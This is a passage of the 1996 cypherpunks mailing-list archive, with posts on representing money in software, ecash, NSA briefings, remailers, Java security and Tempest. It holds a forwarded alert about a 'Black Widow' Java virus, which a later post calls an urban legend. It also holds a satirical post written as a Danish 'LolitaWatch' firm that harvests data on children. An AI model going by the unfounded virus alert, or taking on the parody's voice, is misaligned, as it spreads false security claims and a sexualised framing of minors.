> as 96-bit vectors of a base unit (eg, a penny), and 
> could have a 'binary point' anywhere in the vector. There were
> the usual math functions available to handle this data type.

Sounds like the usual fixed point hack used for manipulating and
storing money. Most systems I've seen use things like this.

Floats have all sorts of defects, like not conveniently indicating to
you the point at which they start dropping precision. A float doesn't
care that it just started dropping vast amounts of the precision in
some calculation where you are unfortunate enough to have done the
order of operations wrong. At that point, a hack will have kept its
precision or will indicate overflow, but floats blythely keep on
going. This leads to very unpleasant problems down the road.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 24 May 1996 12:46:49 +0800
To: cypherpunks@toad.com
Subject: Re: GAK3
Message-ID: <199605232224.PAA20814@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"That's a very powerful thing. Suppose the king of England, or the French
government, for example, says that you must use our way of assigning
identity, and if you do not use our way to assign identity you don't get to
play. By doing this they get complete control over the system. Good points
and bad points, but if they can make it stick, it's a very powerful
position to be in. Indeed it's the position of the king or the sovereign.
The identity by fiat."

... [Discussion of Microsoft/Visa proprietary, patented and non-disclosed
CA system elided]

"So if you allow this sort of a vertically-integrated system to come into
place, whoever controls that vertically-integrated system will have control
not only over the liquidity--that is, issuing you money--they will end up
with a monopoly over the control of the content. Having a monopoly over the
content, of course, gives them the power to tax, and the power to get
revenues as a percentage of those sales transactions.

"So we conclude by asking these questions: If identity no longer comes from
your bank, but from your PC operating system, what role does your bank have
in granting you liquidity? And if your identity comes from your PC
operating system, why can't the PC operating system grant you liquidity?
And, indeed, granting you liquidity is known as extending credit. And
extending credit is, and has been, historically the function of banks and
banks alone.

"The point of this discourse into identity and liquidity is to get you to
think a little bit about the power of the way that these different systems
go together using the bionomic model. If we indeed live with historical,
pyramidal kinds of structures, we step right into an economic world where
there is, by default, the accident of handing someone else the ability to
provide us taxation. If we, on the other hand, maintain autonomies--small
self-organizing groups with a language that allows us to communicate from
group to group--along with that economic freedom comes a social freedom."

        - Bill Melton, CEO-CyberCash Inc.

Quoted in: http://www.upside.com/news/archive/speech/melton/melton.html



------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 24 May 1996 11:06:06 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605232224.PAA20822@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 PM 5/23/96 -0700, sameer@c2.org wrote:
> 
> Paraphrasing the "Wired" item, "No person who has ever received "The
> Briefing" has ever again argued forcefully for the rights of citizens to
> use strong cryptography."

I assume that since Senator Leahy is a co-sponsor of the Burns bill, "The
Briefing's" effects are not long lasting.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 24 May 1996 11:16:19 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605231937.MAA25268@clotho.c2.org>
Message-ID: <199605232231.PAA13882@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sameer Parekh writes:

> 	It's my understanding that this statement is now false. I
> believe that Matt Blaze recently received "The Briefing" and he is
> still on our side.

Don't suppose Matt could do a little executive summary of 
"The Briefing" and post it to the list, could he?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 24 May 1996 08:37:49 +0800
To: cypherpunks@toad.com
Subject: National Journal article sez net-activism is just political hicks
Message-ID: <v0151010dadca7ae9c340@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Thu, 23 May 1996 11:04:50 -0700
>From: jwarren@well.com (Jim Warren)
>Subject: National Journal article sez net-activism is just political hicks
>Sender: owner-fight-censorship@vorlon.mit.edu
>Precedence: bulk
>X-URL: http://fight-censorship.dementia.org/top/
>
>Tommorrow, Washington's politically-powerful National Journal reportedly
>will publish a know-nothing piece of "journalism" saying that net-aided
>politics is essentially nothing but a batch of ineffective, know-nothing
>nerds and back-water political hacks.
>
>Check it out on Friday or thereafter -- at www.politicsusa.com -- and
>forward your *informed* comments to the NJ's Editor and Letters Editor.
>
>--jim
>
>On the other hand, maybe we ought to just continue escalating our political
>effectiveness using the net, and let it come as a total shock to the
>Beltway insiders who trust this piece of misinformed blather ... when we
>provide more and more swing votes in contested elections -- as already
>occured with DeFoley8 against ex-Speaker Tom Foley, VTW for now-Senator Ron
>Wyden, me for now-available Calif legislative data, the gun BBS against
>ex-Calif Senate Prez Pro Tem David Roberti, etc.  :-)
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Fri, 24 May 1996 09:21:49 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199605231521.IAA18698@netcom13.netcom.com>
Message-ID: <Pine.SCO.3.93.960523153505.22931B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 May 1996, it was written:

>                   Copyright 1996 The New York Times Company
>                                      ^^^^^^^^^^^^^^ 
>            Report Warns of Security Threats Posed by Computer Hackers
>                                     ^^^^^^           ^^^^^^^^ ^^^^^^^
>            [W] ASHINGTON -- Government investigators warned
>            Wednesday that computer hackers cruising the
>                                            ^^^^^^^^
>            Internet posed a serious and growing threat to national
>            ^^^^^^^^            
>            security, with the Pentagon suffering as many as 250,000
>                                                             ^^^^^^^
>            "attacks" on its computers last year.
>            ^       ^

So, what's your point other than:

a)  You figured out how to use the "shift-6" on your keyboard, and

b)  You can remove the "from" header in your e-mail

Are we supposed to be impressed?

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 24 May 1996 08:24:19 +0800
To: trei@process.com
Subject: Re: ecash representation
In-Reply-To: <199605231725.KAA18985@toad.com>
Message-ID: <96May23.154209edt.20491@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Peter Trei" <trei@process.com> writes:


    > "Did you know that there is a subunit of the Japanese yen?"

I lived there for three years, and I don't remember that...

-Robin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 24 May 1996 02:32:40 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960523122903.003b857c@mail.pi.se>
Message-ID: <199605231344.PAA29038@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity known as "Matts Kallioniemi" <matts@pi.se> wrote something like:
>
> Sure, but we were really discussing Ecash(tm), not accounting. To quote
> from the FAPI:
> 
> /* An EC_Amount is a signed 32-bit integer.  It represents an amount 
>  * of money in units of the coinage's base value.  
>  */


Note "units of the coinage's base value".  The coinage's base
value could be 0.000000007 Lira if the bank so desired.
Unfortunately since the largest EC_Amount in the API is 2^31,
you wouldn't be able to buy much with coins of that type.  :-)
It is more likely that the coinage's base value will be 0.01
U.S. Dollars or 0.0001 U.S. Dollars or something on that order.


If a need arises for a greater range of values, the Ecash(tm)
API can be easily extended by using a larger int for EC_Amount.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaRrokjbHy8sKZitAQGeVAMAqKcDlnOlHH+HF98aK6M75AelWFMtw36z
tyRGlKp04jLtbmzL634ojoH+3zf+FyQvz+1pQCJw2sgkBChD0vsxomP/dqb2UXYK
RPEBjAchsw8TU4xuq/yunB4j4RNoru9q
=gNIJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gcg@pb.net
Date: Fri, 24 May 1996 09:29:50 +0800
To: cypherpunks@toad.com
Subject: VIRUS ALERT: Java virus that affects Netscape 2.0 & 2.01.
Message-ID: <2.2.32.19960523202049.006a6eac@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>WHO IS AFFECTED BY THIS ALERT?
>------------------------------
>
>Users of Netscape Navigator 2.0 or 2.01.  To determine what version of
>Netscape you are running, do the following:
>
>     1.  Open Netscape Navigator.
>     2.  Pull down the Help menu.
>     3.  Click on About Netscape.
>     4.  Check to see if you have version 2.0 or 2.01.  If so, read on.
>         If not, then you can not be affected by this alert.
>
>WHAT IS THE PROBLEM?
>--------------------
>
>There have been reports lately of a hostile Java applet (a Black Widow
>Java applet called JAVA) that is downloaded and executed automatically
>when certain sites are visited with Netscape versions 2.0 or 2.01.  Java
>applets are small applications that are automatically started when you
>access certain web pages.  This particular Java applet is a malicious
>program that can destroy data, interfere with your network, and possibly
>even upload sensitive material to a third party.
>
>WHAT SHOULD YOU DO?
>-------------------
>
>Upgrade to Netscape Navigator 2.02.
>
>
>WHAT SHOULD YOU DO IF YOU CAN'T DOWNLOAD VERSION 2.02 RIGHT NOW?
>----------------------------------------------------------------
>
>You can temporarily protect your PC or Macintosh by disabling the Java
>functionality.  However, this should only be a short-term fix as many
>legitimate web sites make use of Java applets.  To disable the use of
>Java applets, do the following:
>
>     1.  Open Netscape Navigator.
>     2.  Pull down the Options menu.
>     3.  Click on Security Preferences.
>     4.  Under General, place a "X" in the Disable Java and the
>         Disable Java Script boxes in the Java window.  Click on OK.
>
>After upgrading to the latest version of Netscape Navigator (version
>2.02), re-enable the Java applets by doing the following:
>
>     1.  Open Netscape Navigator.
>     2.  Pull down the Options menu.
>     3.  Click on Security Preferences.
>     4.  Under General, remove the "X" in the Disable Java and the
>         Disable Java Script boxes in the Java window.  Click on OK.
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 24 May 1996 08:50:03 +0800
To: rpowell@algorithmics.com>
Subject: [NOISE] Re: ecash representation
Message-ID: <199605232012.NAA22771@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> >>>>> "Peter Trei" <trei@process.com> writes:
>     > "Did you know that there is a subunit of the Japanese yen?"
> 
> I lived there for three years, and I don't remember that...
> 
> -Robin

It hasn't been used much since the value of the Yen dropped 
after WW2, but 100 sen = 1 yen.

I don't think there is any actual sen currancy in circulation. A 
numistmatist (sp?) might be able to tell you more.

Peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Fri, 24 May 1996 12:18:28 +0800
To: cypherpunks@toad.com
Subject: Re: Floating Point and Financial Software
In-Reply-To: <v02140b01adca741015f0@[17.128.203.188]>
Message-ID: <Pine.3.89.9605231627.A7497-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 23 May 1996, Martin Minow wrote:

> A 64-bit floating point number (i.e., C double) should be suitable for
> financial software under the following conditions:
> 
> -- Money must be represented in integral units (cents, not dollars and
> cents).
> 
> -- The maximum value to be computed must be less than about 10^17. This
>    includes intermediate values.
> 
> -- Addition, subtraction, and multiplication by an integer are the
>    only operators.
> 
> Under the above conditions, there should be no loss of precision.
> 
> However, when division is required (as in currency conversion
> or interest rate computation), one must be careful to control
> round-off error. For example, a mortage payment schedule might
> be computed using true (non-exact) floating-point arithmetic, with
> the last or first payment adjusted to cover any residual error.
> (You might want to re-read Donn Parker's book on computer crime,
> paying special attention to the "salami" method of embezzelment
> by accumulating round-off errors in a private account.)

Yes, I suppose we could revive the urban legend about the programmer at 
SW Bank in Houston who did this slight of hand for 18 mos and then split 
the country.

But there is a simpler method to avoid the problem entirely. There is 
suffcient horsepower in uP's these days to support "long hand" division 
and multiplication. Granted it takes some extra grey matter to write the 
routines, but once done, you can vary the amount of precision to whatever 
you desire and not have to worry about accuracy.

The only penalty you pay for is time. If you need the accuracy, you'll 
gladly give the time, or put more horsepower in the box.

> 
> Note that not all financial computation needs to be done with "to
> the penny" accuracy: even our own dearly beloved IRS allows
> (indeed, encourages) us to compute our tax declaration using
> a whole-dollar round-off method.
> 
> Martin Minow
> minow@apple.com
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 12:29:36 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605232353.QAA19079@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 PM 5/23/96 -0700, Timothy C. May wrote:
>
>"If you only knew what we know..."
>
>("...you wouldn't support encryption, you wouldn't push for privacy
>legislation, you would order all citizen-units to have tatooed ID numbers
>on their arms...")
>
>Though I normally avoid "Wired," I did pick up the latest issue to skim
>through. A couple of good things, actually, including a nice summary of the
>state of crypto laws, etc. (I don't recall the author, as I didn't buy the
>issue.)
>
>A great discussion of the Deepest and Darket Secret in Washington, the
>special "If you only knew what we know..." briefing given to legislators,
>staffers, etc. to convince them of the Evils of Cryptography.


There is a clue here.  If that briefing is so effective, why don't they give 
it to the entire country?

We "all" know (at least around CP) of a number of sorta-bad things that 
might occur as a consequence of allowing good cryptography.  (none of which, 
on balance, even come close to justifying banning or restricting good 
crypto, or justify GAK, etc.)   However, very few of them require more than 
a little imagination to invent on our own, and given communication most of 
them will be thought of and disseminated without being revealed by the 
government.  So it's a bit difficult to imagine why they'd avoid discussing 
those issues in public.

The clue, I think, is that this briefing is given to "legislators, staffers, 
etc".  Presumably, whatever arguments they use in this briefing are quite
selective and tailored to appeal to government types.  They're telling these 
people of a argument against good encryption that works for government-types 
but NOT ordinary civilians.  It isn't that they don't want the average 
civilian to know of these arguments, they simply don't want the populace to 
know what subset of these consequences the government is really concerned about.

Okay, what kind of thing would terrify government-types but not most civilians?  

>Paraphrasing the "Wired" item, "No person who has ever received "The
>Briefing" has ever again argued forcefully for the rights of citizens to
>use strong cryptography."
>I surmise that either Sen. Burns has not yet been given The Briefing, or he
>is for some reason more resistant than most other burrowcrats to the scare
>tactics used in The Briefing.
>I sure would like to know what's in this briefing.
>--Tim May

It probably starts like this:   "See, there's this guy named Jim Bell...."  B^)

Seriously, though, I can't see how it could be anything other than the 
typical Crypto-Anarchy-type scenarios, but presented as if they are a Bad 
Thing as opposed to being a Good Thing.  This would fit all the criteria:  
They appear to be extremely bad from the standpoint of the government-types, 
are not particularly convincing to the citizens, and the government wouldn't 
want the public to know what they're most concerned with.  It might start'em thinking.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 24 May 1996 10:52:28 +0800
To: cypherpunks@toad.com
Subject: Innocence & harmless weapons
Message-ID: <199605232202.RAA22518@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Sandy et al.,

Whose side of the truth? To be honest I was surprised by your simplistic
responce.


                                                    Jim Choate


Forwarded message:

> From cypherpunks-errors@toad.com Thu May 23 16:01:31 1996
> Message-Id: <2.2.32.19960523200615.0072a288@popmail.crl.com>
> X-Sender: sandfort@popmail.crl.com
> X-Mailer: Windows Eudora Pro Version 2.2 (32)
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Thu, 23 May 1996 13:06:15 -0700
> To: jim bell <jimbell@pacifier.com>
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace 
> Cc: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                        SANDY SANDFORT
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> At 12:11 PM 5/23/96 -0800, jim bell wrote:
> 
> >Tell ya what: name a weapon that CANNOT be used to harm an 
> >innocent person.  Go ahead, I'm waiting.
> 
> The Truth?
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Fri, 24 May 1996 13:54:33 +0800
To: gcg@pb.net
Subject: Re: VIRUS ALERT: Java virus that affects Netscape 2.0 & 2.01.
In-Reply-To: <2.2.32.19960523202049.006a6eac@mail.pb.net>
Message-ID: <199605240129.SAA00250@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


We've reached urban legend time for Java...?   

There is no Java virus known as "Black Widow".  There was a melodramatic
web article about Java security that used the title "Black Widow", a pun
on the web.  The article focused mostly on the danger of denial-of-service
applets that consume resources on the client.  While rude, annoying, and
potentially the cause of losing unsaved edits in a word processor, (if you
were flumoxed and panic'd and instead of killing your browser, you
rebooted your computer and lost any pending edits) denial-of-service
applets are *not* viruses.  And they are not stalking the web.  Really. 

I work on Java security at JavaSoft which is part of Sun, and try to keep
our web page up to date.  See http://java.sun.com/sfaq/ for info. 

In the "for what it's worth dept", the security breaches that have gotten
so much press are fixed in JDK 1.0.2, our current release, and in NN3.0b4. 
This includes the bug mentioned in the May 18 NY Times story. 

Marianne





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herodotus@alpha.c2.org
Date: Fri, 24 May 1996 14:03:24 +0800
To: cypherpunks@toad.com
Subject: Attacks on remailers
Message-ID: <199605240137.SAA28344@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


The current discussion on the future of remailers seems to have been
ignited by two events: the closure of the Hacktic remailer and the FBI's
contacting an operator about a threatening message sent through his
remailer.  We have, however, almost no actual information about the
two incidents, especially the type of threats, if any, made against the
operators of the two remailers.

This lack of information makes it difficult for others interested in
remailers to make informed decisions about their future.  We need
more specific information about these two incidents.

--
Herodotus <herodotus@alpha.c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 24 May 1996 14:56:04 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: your mail
In-Reply-To: <Pine.SCO.3.93.960523153505.22931B-100000@grctechs.va.grci.com>
Message-ID: <Pine.GUL.3.93.960523184926.22413Y-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 May 1996, Mark O. Aldrich wrote:

> So, what's your point other than:
> 
> a)  You figured out how to use the "shift-6" on your keyboard, and
> 
> b)  You can remove the "from" header in your e-mail
> 
> Are we supposed to be impressed?

Well, he's got his name in lights. Shouldn't we all be impressed? I'm
certainly impressed that he's figured out, all by his lonesome, how to Cc
every Usenet and cypherpunks post to me. 

http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/h/harman.david





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 13:58:29 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: Innocence & harmless weapons
Message-ID: <199605240159.SAA25213@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


While it was a slick one-liner, it was also wrong. The truth can indeed harm 
innocents.  For example, "The truth is that Anne Frank lived in an Amsterdam 
attic."  is an excellent example of a truth that can, indeed, be used to 
harm people should it become known.  The reason we use encryption is to 
disguise truths that we don't want others to know, and if those truths 
become known there may indeed be harm to innocents..



At 05:02 PM 5/23/96 -0500, Jim Choate wrote:

>Whose side of the truth? To be honest I was surprised by your simplistic
>responce.
>                                                    Jim Choate
 
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>                        SANDY SANDFORT
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> 
>> At 12:11 PM 5/23/96 -0800, jim bell wrote:
>> 
>> >Tell ya what: name a weapon that CANNOT be used to harm an 
>> >innocent person.  Go ahead, I'm waiting.
>> 
>> The Truth?
>> 
>> 
>>  S a n d y

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 14:14:20 +0800
To: cypherpunks@toad.com
Subject: Re: National Journal article sez net-activism is just political hicks
Message-ID: <199605240208.TAA25747@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:31 PM 5/23/96 -0500, Declan McCullagh wrote:
>
>>Date: Thu, 23 May 1996 11:04:50 -0700
>>From: jwarren@well.com (Jim Warren)
>>Subject: National Journal article sez net-activism is just political hicks
>>Sender: owner-fight-censorship@vorlon.mit.edu
>>Precedence: bulk
>>X-URL: http://fight-censorship.dementia.org/top/
>>
>>Tommorrow, Washington's politically-powerful National Journal reportedly
>>will publish a know-nothing piece of "journalism" saying that net-aided
>>politics is essentially nothing but a batch of ineffective, know-nothing
>>nerds and back-water political hacks.

At least we now know that the National Journal hasn't heard of 
Cyber-Anarchy--- or they didn't understand one word of it.



>>Check it out on Friday or thereafter -- at www.politicsusa.com -- and
>>forward your *informed* comments to the NJ's Editor and Letters Editor.
>>
>>--jim
>>
>>On the other hand, maybe we ought to just continue escalating our political
>>effectiveness using the net, and let it come as a total shock to the
>>Beltway insiders who trust this piece of misinformed blather ... when we
>>provide more and more swing votes in contested elections -- as already
>>occured with DeFoley8 against ex-Speaker Tom Foley, VTW for now-Senator Ron
>>Wyden, me for now-available Calif legislative data, the gun BBS against
>>ex-Calif Senate Prez Pro Tem David Roberti, etc.  :-)

Slowly but surely, they're learning!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Fri, 24 May 1996 07:53:28 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <Pine.3.89.9605231908.A187-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Bill Stewart wrote:

> A secondary concern is handling multi-casts - should the remailer
> create one copy for each recipient (secure, easy, space-wasteful),
> or should it try to get fancy and keep the message for N recipients or D days?

Easy on Unix - just create N links to the same file, delete each link as
the recipient requests it, and delete all remaining links after D days. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 24 May 1996 14:21:16 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <adca67d204021004ac12@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Lauren Amy Gelman said:

>The text of the Children's Privacy Protection and Parental Empowerment
>Act is available at the Epic "Children's Privacy" web site:
>
>http://epic.org/privacy/kids/
>
>Read it before you trash it!


We at LolitaWatch GMBH are amused that legislators in the United States are
attempting to legislate that which can be so easily bypassed with the
world-wide Internet.

In fact, anticipating such restrictions on the collection of some data, we
moved our operations to Aalborg, Danmark earlier this year.

(Forslag og ideer vedr. indhold modtages gerne af: www@lolita.nordjyllands .dk )

Danish laws are not so repressive as American laws, and our American
friends can so easily access our data bases of information derived from the
mandatory age-labeling tags you Americans so conveniently (for us) insist
upon.

--Klaus Jellingestenen









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 24 May 1996 14:34:43 +0800
To: cypherpunks@toad.com
Subject: SF Bay Area: Topics (?) for Meeting June 8th
Message-ID: <Pine.GUL.3.93.960523190845.22413a-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Apologies if you prefer leaving these for the last minute.

Unless someone has a better place, we'll meet at Stanford again, this time
with a big enough room, fewer singing trees, and less sun putting me to
sleep.

Since we'll have a projection screen and multiple T3 Internet connection
(knock on wood), it might be nice to show off some mockups of crypto GUIs,
as discussed last time. Just hack together some GIFs or HTML to show what
you like. 

In order to justify a room, this will be billed as a Stanford PGP Club
meeting, so a key signing and a presentation from somebody (?) on some PGP
thing (?) would probably be appropriate.

Any chance of what's-their-name that stood us up last time showing up this
month?

There may be a speaker from CMU talking about net.censorship and
privacy/pseudonymity in academia.

Other topics?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 24 May 1996 09:12:35 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605232006.UAA29852@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Cassidy, an esteemed subscriber here, is the Wired author Tim notes,
who reports on the Bernstein case in the June issue. A well-written piece
with several thought-provokings in addition to those cited by Tim. 
 
 
Peter writes of Judge Marilyn Hall Patel on the Bernstein case: 
 
 
"Before the case is resolved, Patel's skepticism of the state's perogatives
will be tested to the limit when the government is called upon to defend
its policy. Patel is then likely to be given the *in camera* presentation
of The Deepest Darkest Secrets of Cryptography -- probably a modified
version of the classifed briefing the NSA has used with great success to
influence members of Congress. Legend has it that no one who ever got 'the
briefing' ever again opposed the agency." 
 
 
Peter, anyone, are these welcome-to-the-inner-circle briefings always by
NDA, or worse threat? 
 
 
Wonder if a public-spirited cryptographer is working on a book for a movie
about this heart of the deepest darkness? 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 24 May 1996 15:03:38 +0800
To: Christian Wettergren <cypherpunks@toad.com
Subject: Re: Runtime info flow in Java
Message-ID: <adcad058000210047d0d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:06 AM 5/9/96, Christian Wettergren wrote:
>Hi!
>
>I'm presenting my licentiate research proposal
>next week, and I thought that some of you might
>find it interesting. I'd like to find others
>that are working with similar projects, to have
>some people to discuss with.
>
>The actual proposal is available at
>
>     http://www.it.kth.se/~cwe/phd/licprop.ps

I began to look at your paper online but that works poorly for me. My
printer does not handle A4 paper. PostScript seems inflexible in this
regard. If it were available in 8.5 X 11 inch format you would have least
one more reader.

I am interested in your paper because you define the problem as we do.
There are some who think that capability architectures are the solution.
There is little information on how to solve these problems with
capabilities. I am trying to find time to address some of these issues.

KeyKOS is a capability based operating system that is designed to solve a
variety of security problems. There are some papers at
<http://www.cis.upenn.edu/~KeyKOS> and
<http://www.webcom.com/agorics/library.html>.

We find that Java as a language conforms well enough to capability
principles even though not using the term. Some of the primordial classes
do not conform and indeed it was there that the Princeton group found the
problems that are most difficult to fix.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 24 May 1996 15:07:03 +0800
To: cypherpunks@toad.com
Subject: Re: [hrdware] anti-Tempest video settings
Message-ID: <adcae054010210043e8c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM 5/10/96, Jean-Francois Avon wrote:
>Hi again.
>
>Is there anybody that have any idea about a color setting that would
>make it more difficult to detect by a Tempest attack?
>(I assume that Tempest cannot discriminate between various color guns
>and signals in the monitor...  Maybe I am completely wrong...)
....
I imagine that a color combination that cancels for an antenna in one
location will not cancel for another location. Many monitors have separated
wires for the separate colors.  A color combination that cancels for one
antenna polarization may not cancel for the other.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 24 May 1996 15:21:33 +0800
To: cypherpunks@toad.com
Subject: FYA: "The ANOREV INTERCEPTS" [Usenet censorship] (fwd)
Message-ID: <Pine.GUL.3.93.960523200054.22413c-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Sometimes I amaze even myself, or whoever people think I am. This was
written by Tallpaul, everyone's favorite anti-fascist activist.

-rich

            INFORMATIONAL FOLLOWUP TO INTERNET NEWS GROUPS
                        "rec.music.white-power"
                        "soc.politics.marxism"
                    "talk.politics.natl-socialism"

Because of the role I played in the campaign to get people to VOTE NO
on "rec.music.white-power" many people have sent me e-mail asking about
the vote results on several political news groups on the internet. The
following is the latest data available as posted in the official USENET
news group called "news.groups".

1. "rec.music.white-power" (RMW-P)

Today, May 21 at 04:46 GMT, the vote taker Michael Handler posted a
message to "news groups" that read:

"I have completed the tabulation of the rec.music.white-power vote, and
submitted the results to David Lawrence. They should be posted shortly.

"I will comment more on the subject, including regarding the delay in
the posting of the results, once the results have been posted to
news.announce.newgroups."

The battle over RMW-P was perhaps the most intensive in the history of
the internet and informal earlier reports indicated the raw vote broke
